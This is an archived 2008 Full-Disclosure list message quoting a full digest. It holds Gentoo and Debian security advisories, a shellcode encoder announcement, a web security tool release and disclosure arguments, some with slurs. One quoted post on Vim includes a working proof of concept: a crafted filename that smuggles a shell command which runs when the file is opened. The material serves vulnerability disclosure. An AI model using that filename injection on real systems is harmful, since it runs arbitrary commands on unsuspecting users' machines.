lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BLU115-W501D3315358C092640A8DCDC990@phx.gbl>
Date: Wed, 2 Jul 2008 14:15:35 +0300
From: badr muhyeddin <gigiyousef@...mail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Re: Full-Disclosure Digest, Vol 41, Issue 3


> From: full-disclosure-request@...ts.grok.org.uk> Subject: Full-Disclosure Digest, Vol 41, Issue 3> To: full-disclosure@...ts.grok.org.uk> Date: Wed, 2 Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list submissions to> full-disclosure@...ts.grok.org.uk> > To subscribe or unsubscribe via the World Wide Web, visit> https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email, send a message with subject or body 'help' to> full-disclosure-request@...ts.grok.org.uk> > You can reach the person managing the list at> full-disclosure-owner@...ts.grok.org.uk> > When replying, please edit your Subject line so it is more specific> than "Re: Contents of Full-Disclosure digest..."> > > Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.> > > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple integer overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code> (Tobias Heinlein)
 > 3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (mrdkaaa@...eam.cz)> 5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1> ( Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of> service (Steve Kemp)> 7. [tool] ratproxy - passive web application security assessment> tool (Michal Zalewski)> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (Filipe Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open> (DeepSec 2008)> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)> > > ----------------------------------------------------------------------> > Message: 1> Date: Tue, 01 Jul 2008 13:51:43 +0200> From: Tobias Heinlein <keytoaster@...too.org>> Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer> overflows> To: gentoo-anno
 unce@...too.org> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,> security-alerts@...uxsecurity.com> Message-ID: <486A1A4F.1080404@...too.org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-01> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Python: Multiple integer overflows> Date: July 01, 2008> Bugs: #216673, #217221> ID: 200807-01> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple integer overflows may allow for Denial of Service.> > Background> ==========> > Python is an interpreted, interactive, object-oriented programming> language.> > Affected packages> =================> > -------------------------------------------------------
 ------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6> >= 2.4.4-r13> > Description> ===========> > Multiple vulnerabilities were discovered in Python:> > * David Remahl reported multiple integer overflows in the file> imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).> This issue is due to an incomplete fix for CVE-2007-4965.> > * Justin Ferguson discovered that an integer signedness error in the> zlib extension module might trigger insufficient memory allocation> and a buffer overflow via a negative signed integer (CVE-2008-1721).> > * Justin Ferguson discovered that insufficient input validation in> the PyString_FromStringAndSize() function might lead to a buffer> overflow (CVE-2008-1887).> > Impact> ======> > A remote attacker could exploit these vulnerabilities to cause a Denial> of Service or possibly the remote execution of arbitrary code with the
 > privileges of the user running Python.> > Workaround> ==========> > There is no known workaround at this time.> > Resolution> ==========> > The imageop module is no longer built in the unaffected versions.> > All Python 2.3 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"> > All Python 2.4 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"> > References> ==========> > [ 1 ] CVE-2008-1679> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679> [ 2 ] CVE-2008-1721> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721> [ 3 ] CVE-2008-1887> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887> > Availability> ============> > This GLSA and any updates to it are available for viewing at> the Gentoo Security Website:> > http://security.gentoo.org/glsa/glsa-200807-01.xml> > Concerns?> =========> > Security 
 is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. Any security concerns should be addressed to> security@...too.org or alternatively, you may file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP digital signature> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin > > ------------------------------> > Message: 2> Date: Tue, 01 Jul 2008 13:59:36 +0200> From: Tobias Heinlein <keytoaster@...too.org>> Subject: [Full-disclosure] [
  GLSA 200807-02 ] Motion: Execution of> arbitrary code> To: gentoo-announce@...too.org> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,> security-alerts@...uxsecurity.com> Message-ID: <486A1C28.3010409@...too.org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-02> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Motion: Execution of arbitrary code> Date: July 01, 2008> Bugs: #227053> ID: 200807-02> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple vulnerabilities in Motion might result in the execution of> arbitrary code.> > Background> ==========> > Motion is a program that monitors the video signal from one or more> cameras and is able
  to detect motions.> > Affected packages> =================> > -------------------------------------------------------------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 1 media-video/motion < 3.2.10.1 >= 3.2.10.1> > Description> ===========> > Nico Golde reported an off-by-one error within the read_client()> function in the webhttpd.c file, leading to a stack-based buffer> overflow. Stefan Cornelius (Secunia Research) reported a boundary error> within the same function, also leading to a stack-based buffer> overflow. Both vulnerabilities require that the HTTP Control interface> is enabled.> > Impact> ======> > A remote attacker could exploit these vulnerabilities by sending an> overly long or specially crafted request to a vulnerable Motion HTTP> control interface, possibly resulting in the execution of arbitrary> code with the privileges of the motion user.> > Workaround> ==========> > There is no known work
 around at this time.> > Resolution> ==========> > All Motion users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"> > References> ==========> > [ 1 ] CVE-2008-2654> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654> > Availability> ============> > This GLSA and any updates to it are available for viewing at> the Gentoo Security Website:> > http://security.gentoo.org/glsa/glsa-200807-02.xml> > Concerns?> =========> > Security is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. Any security concerns should be addressed to> security@...too.org or alternatively, you may file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008 Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The contents of this document are licensed under the> Creative Commons - Attribution / Share Alike 
 license.> > http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP digital signature> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin > > ------------------------------> > Message: 3> Date: Tue, 1 Jul 2008 14:18:34 +0200> From: "Berend-Jan Wever" <berendjanwever@...il.com>> Subject: [Full-disclosure] Alphanumeric shellcode improvements> To: full-disclosure@...ts.grok.org.uk> Message-ID:> <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@...l.gmail.com>> Content-Type: text/plain; charset="iso-8859-1"> > Hi all,> > I've not had as much opportunity in the last three years to contribute, but> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,> the upcoming new version of my alphanumeric shellcode encoder:> * I've reduced the size of the mixedca
 se ascii decoder:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86> * I've created a lowercase ascii decoder:> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86> * I've created a mixedcase ascii decoder for x64:> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and> some documentation.> > Cheers,> SkyLined> > -- > Berend-Jan "SkyLined" Wever> Email & Live messenger: berendjanwever@...il.com> --> 'The historical abuses of new data occurred between the time that a few> people learned the important thing and the time when that important thing> became general knowledge. To the Gowachin and to BuSab it was the "Data> Gap," a source of constant danger.'> -- Frank Herbert, 'The Dosadi Experiment'> -------------- next part --------------> An HTML attachment was scrubbed...> URL: http://lists
 .grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html > > ------------------------------> > Message: 4> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)> From: mrdkaaa@...eam.cz> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To: full-disclosure@...ts.grok.org.uk> Message-ID: <4.4-28953-1047754371-1214923194@...eam.cz>> Content-Type: text/plain; charset="us-ascii"> > This vulnerability is at least two years old. Anyway, what's the point of releasing> a security advisory for a vendor well known to never going to patch it?> > > > ------------------------------> > Message: 5> Date: Tue, 1 Jul 2008 20:36:29 +0100> From: " Jan Min?? " <rdancer@...ncer.org>> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully> Patched Vim 7.1> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,> vim_dev@...glegroups.com, "Bram Moolenaar" <Bram@...lenaar.net>> Cc: bugs@....org> Message
 -ID:> <6edf76c20807011236t7f96955h924c2692705b6ff4@...l.gmail.com>> Content-Type: text/plain; charset=UTF-8> > On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@...lenaar.net> wrote:> >> > Jan Minar wrote:> >> >> 1. Summary> >>> >> Product : Vim -- Vi IMproved> >> Version : Tested with 7.1.314 and 6.4> >> Impact : Arbitrary code execution> >> Wherefrom: Local and remote> >> Original : http://www.rdancer.org/vulnerablevim.html> >>> >> Improper quoting in some parts of Vim written in the Vim Script can lead to> >> arbitrary code execution upon opening a crafted file.> > > Note that version 7.1.314, as reported in the Summary, does not have> > most of the reported problems. The problems in the plugins have also> > been fixed, this requires updating the runtime files. Information about> > that can be found at http://www.vim.org/runtime.php> > I do apologize: as written in the advisory, the version I worked with> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have> 
 updated the advisory at http://www.rdancer.orgvulnerablevim.html .> > Thanks to Bram for all the good work.> > 7.2a.10 with updated runtime is still vulnerable to the zipplugin> attack, and an updated tarplugin attack:> > -------------------------------------------> -------- Test results below ---------------> -------------------------------------------> filetype.vim> strong : EXPLOIT FAILED> weak : EXPLOIT FAILED> tarplugin : EXPLOIT FAILED> tarplugin.updated: VULNERABLE> zipplugin : VULNERABLE> xpm.vim> xpm : EXPLOIT FAILED> xpm2 : EXPLOIT FAILED> remote : EXPLOIT FAILED> gzip_vim : EXPLOIT FAILED> netrw : EXPLOIT FAILED> > The original tarplugin exploit now produces a string of telling error messages:> > /bin/bash: so%: command not found> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:> Cannot open: No such file or directory> tar: Error is not recoverable: exiting now> /bin/bash: retu: command not found> /bin/bash: bar.tar|retu|'bar.tar: command not found>
  > It's easy to see that it is still possible to execute arbitrary shell commands.> > $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:> > 136 if tarfile =~# '\.\(gz\|tgz\)$'> 137 " call Decho("1: exe silent r! gzip -d -c> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd." -".g:tar_browseoptions." - "> 139 elseif tarfile =~# '\.lrp'> 140 " call Decho("2: exe silent r! cat --> ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."> -".g:tar_browseoptions." - ")> *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c> -|".g:tar_cmd." -".g:tar_browseoptions." - "> 142 elseif tarfile =~# '\.bz2$'> 143 " call Decho("3: exe silent r! bzip2 -d -c> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd." -".g:tar_browseoptions." - "> 145 else> 146 " call Decho("4: exe silent r! ".g:tar_cmd."> -".g:tar_browseoptions
 ." ".s:Escape(tarfile))> **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."> ".s:Escape(tarfile)> [...]> 444 fun s:Escape(name)> 445 " shellescape() was added by patch 7.0.111> 446 if exists("*shellescape")> 447 let qnameq= shellescape(a:name)> 448 else> 449 let qnameq= g:tar_shq . a:name . g:tar_shq> 450 endif> 451 return qnameq> 452 endfun> > (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.> > (**) tar(1) allows arbitrary command execution via options ``--to-command'',> and ``--use-compress-program''.> > > The updated tarplugin attack is rather simple:> > $ rm -rf ./*> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |> xxd -r\`;'bar.tar"> $ vim +:q ./foo*> $ ls -l pwned> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned> > Cheers,> Jan Minar.> > > > ------------------------------> > Message: 6> Date: Tue, 1 Jul 2008 21:25:39 +0100> From: Steve Kemp <skx@...ian.org>> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa 
 packages> fix denial of service> To: debian-security-announce@...ts.debian.org> Message-ID: <20080701202539.GA32605@...ve.org.uk>> Content-Type: text/plain; charset=us-ascii> > -----BEGIN PGP SIGNED MESSAGE-----> Hash: SHA1> > - ------------------------------------------------------------------------> Debian Security Advisory DSA-1600-1 security@...ian.org> http://www.debian.org/security/ Steve Kemp> July 01, 2008 http://www.debian.org/security/faq> - ------------------------------------------------------------------------> > Package : sympa> Vulnerability : dos> Problem type : remote> Debian-specific: no> CVE Id(s) : CVE-2008-1648> Debian Bug : 475163> > It was discovered that sympa, a modern mailing list manager, would> crash when processing certain types of malformed messages.> > For the stable distribution (etch), this problem has been fixed in version> 5.2.3-1.2+etch1.> > For the unstable distribution (sid), this problem has been fixed in> version 5.3.4-4.> > We recomme
 nd that you upgrade your sympa package.> > > Upgrade instructions> - --------------------> > wget url> will fetch the file for you> dpkg -i file.deb> will install the referenced file.> > If you are using the apt-get package manager, use the line for> sources.list as given below:> > apt-get update> will update the internal database> apt-get upgrade> will install corrected packages> > You may use an automated update by adding the resources from the> footer to the proper configuration.> > > Debian GNU/Linux 4.0 alias etch> - -------------------------------> > Source archives:> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc> Size/MD5 checksum: 625 c7e720e56b1c4e9778cea822ed150a19> http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz> Size/MD5 checksum: 96804 a93d8ec3dcbc0a0aed99e513c5749c0e> http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz> Size/MD5 checksum: 5102528 355cb9174841205831191
 c93a83da895> > alpha architecture (DEC Alpha)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb> Size/MD5 checksum: 3589148 26b92215ed7b17531c3702ff76b30901> > amd64 architecture (AMD x86_64 (AMD64))> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb> Size/MD5 checksum: 3591854 531781d522ad5f02e6c5b658883ed37d> > arm architecture (ARM)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb> Size/MD5 checksum: 3590606 dc3437760b7db4761f90e992e3638c52> > hppa architecture (HP PA RISC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb> Size/MD5 checksum: 3591482 5601933860831577cb017cb0aa3b31fe> > i386 architecture (Intel ia32)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb> Size/MD5 checksum: 3567454 0c6e3d6046f7d0e9920ed7ce9780b103> > ia64 architecture (Intel ia64)> > http://security.debian.org/p
 ool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb> Size/MD5 checksum: 3571256 c294184494968264ff0857fc2b907711> > mips architecture (MIPS (Big Endian))> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb> Size/MD5 checksum: 3584362 1b3371fe22966b198a3c338167e71909> > powerpc architecture (PowerPC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb> Size/MD5 checksum: 3568314 57c566c13cd31f66bbe3652b4c9ea3e7> > s390 architecture (IBM S/390)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb> Size/MD5 checksum: 3568574 afab57a71590dcdd685746b6500040b0> > sparc architecture (Sun SPARC/UltraSPARC)> > http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb> Size/MD5 checksum: 3568016 0bf312e31bb5df28404ea40842845caf> > > These files will probably be moved into the stable distribution on> its next update.> > - ----------------------------
 -----------------------------------------------------> For apt-get: deb http://security.debian.org/ stable/updates main> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main> Mailing list: debian-security-announce@...ts.debian.org> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>> -----BEGIN PGP SIGNATURE-----> Version: GnuPG v1.4.6 (GNU/Linux)> > iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S> 6REh7OX9zxqgWYGHqQWtEpQ=> =ANTa> -----END PGP SIGNATURE-----> > > > ------------------------------> > Message: 7> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)> From: Michal Zalewski <lcamtuf@...ne.cc>> Subject: [Full-disclosure] [tool] ratproxy - passive web application> security assessment tool> To: bugtraq@...urityfocus.com, websecurity@...appsec.org> Cc: full-disclosure@...ts.grok.org.uk> Message-ID: <Pine.LNX.4.64.0807012124130.17434@...ne.cc>> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed> > Hi all
 ,> > I am happy to announce that we've just open sourced ratproxy - a free, > passive web security assessment tool. This utility is designed to > transparently analyze legitimate, browser-driven interactions with tested > web applications - and automatically pinpoint, annotate, and prioritize > potential flaws or areas of concern on the fly.> > The proxy analyzes problems such as cross-site script inclusion threats, > insufficient cross-site request forgery defenses, caching issues, > potentially unsafe cross-domain code inclusion schemes and information > leakage scenarios, and much more.> > For a detailed discussion of the utility, please visit:> http://code.google.com/p/ratproxy/wiki/RatproxyDoc> > Source code is available at:> http://code.google.com/p/ratproxy/downloads/list> > And finally, screenshot of a sample report can be found here:> http://lcamtuf.coredump.cx/ratproxy-screen.png> > The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since > it is in
  beta, there might be some kinks to be ironed out, and not all web > technologies might be properly accounted for. Feedback is appreciated.> > Please keep in mind that the proxy is meant to highlight interesting > patterns in web applications; a further analysis by a security > professional is required to interpret the significance of results for a > particular platform.> > Cheers,> /mz> > > > ------------------------------> > Message: 8> Date: Wed, 2 Jul 2008 02:19:01 -0300> From: "Filipe Balestra" <filipe@...estra.com.br>> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To: <full-disclosure@...ts.grok.org.uk>> Message-ID: <BEDD65A8CCD54B3BAA75664A0D440A93@...PC>> Content-Type: text/plain; charset="iso-8859-1"> > mrdkaaa,> > are you saying that this vulnerability is not new to the public?> > The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One
  program can have a lot of vulnerabilities :) > > But yes, this vulnerability is at least four years old, but was not public.> > Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?> > p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.> > Cheers,> > Filipe Alcarde Balestra> -------------- next part --------------> An HTML attachment was scrubbed...> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html > > -
 -----------------------------> > Message: 9> Date: Wed, 2 Jul 2008 08:29:43 +0200> From: Tonnerre Lombard <tonnerre.lombard@...roup.ch>> Subject: Re: [Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To: staff@...-disclosure.net> Cc: full-disclosure@...ts.grok.org.uk> Message-ID: <20080702082943.2811aba5@...yg117.sygroup-int.ch>> Content-Type: text/plain; charset="iso-8859-1"> > Salut,> > On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi cant> > steal your money or eat your lunches? Where you can freely submit> > lulz to be published? Where Theo's defeat and denial are brought to> > light? Wait no more!> > You mean a site which evidently cannot tell the difference between> local and remote root vulnerabilities? (The local root exploit for> obsd4 which is published on that site contains a patch to increment the> count of _remote_ vulnerabilities on the obsd web site.)> > Tonnerre> -- > SyGroup G
 mbH> Tonnerre Lombard> > Solutions Systematiques> Tel:+41 61 333 80 33 G?terstrasse 86> Fax:+41 61 383 14 67 4053 Basel> Web:www.sygroup.ch tonnerre.lombard@...roup.ch> -------------- next part --------------> A non-text attachment was scrubbed...> Name: signature.asc> Type: application/pgp-signature> Size: 835 bytes> Desc: not available> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin > > ------------------------------> > Message: 10> Date: Tue, 01 Jul 2008 21:47:36 +0200> From: DeepSec 2008 <deepsec@...psec.net>> Subject: [Full-disclosure] Deepsec Talks 2007 are online -> registration for 2008 is open> To: full-disclosure@...ts.grok.org.uk> Message-ID: <486A89D8.2000303@...psec.net>> Content-Type: text/plain; charset=UTF-8; format=flowed> > Dear Madam, dear Sir,> > DeepSec Vienna, the annual In-Depth Security Conference has opened> online registrations for 2008. Registrations will receive a discount> of 5% off the 
 regular fees until August 31st if you use the following> promotional code: earlybird-L4KZIEUE on our online registration form> at https://deepsec.net/register/> > Videos from 2007 are online:> > Also we are happy to announce that talks from last years conference> are online. Listen to last years talks in full length at:> http://video.google.com/videosearch?q=deepsec&sitesearch=#> > Call for Papers still Open for two weeks:> > If you have some good ideas for a Talk at the conference and haven't> decided yet to submit we encourage you to do so now. We still accept> submissions at https://deepsec.net/cfp/ or via e-mail to:> cfp@...psec.net> > > We hope to hear from you and of course to meet in Vienna in November!> > Best Regards,> > Paul B?hm,> Ren? Pfeiffer,> Michael Kafka> DeepSec GmbH> > > -- > DeepSec In-Depth Security Conference> November 11nd to 14th 2008, Vienna, Austria> https://deepsec.net/> > > > ------------------------------> > Message: 11> Date: Wed, 02 Jul 2008 04
 :08:38 -0300> From: root <root_@...ertel.com.ar>> Subject: Re: [Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To: staff@...-disclosure.net> Cc: full-disclosure@...ts.grok.org.uk> Message-ID: <486B2976.8000708@...ertel.com.ar>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed> > You couldn't do the remote exploit even with a google video documenting > it step by step.> More like fail-disclosure.> > staff wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal> > your money or eat your lunches? Where you can freely submit lulz to be> > published? Where Theo's defeat and denial are brought to light? Wait no> > more!> > > > http://lul-disclosure.net/> > > > WhiteHat? BlackHat? We are lulzhat.> > Fuck you and your hats.> > > > > > > > ------------------------------------------------------------------------> > > > _______________________________________________> > Full-Disclosure - We believe in it.> > Charter: http://list
 s.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia - http://secunia.com/> > > > ------------------------------> > _______________________________________________> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/> > End of Full-Disclosure Digest, Vol 41, Issue 3> **********************************************unsubscribe
 
_________________________________________________________________
Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy!
http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ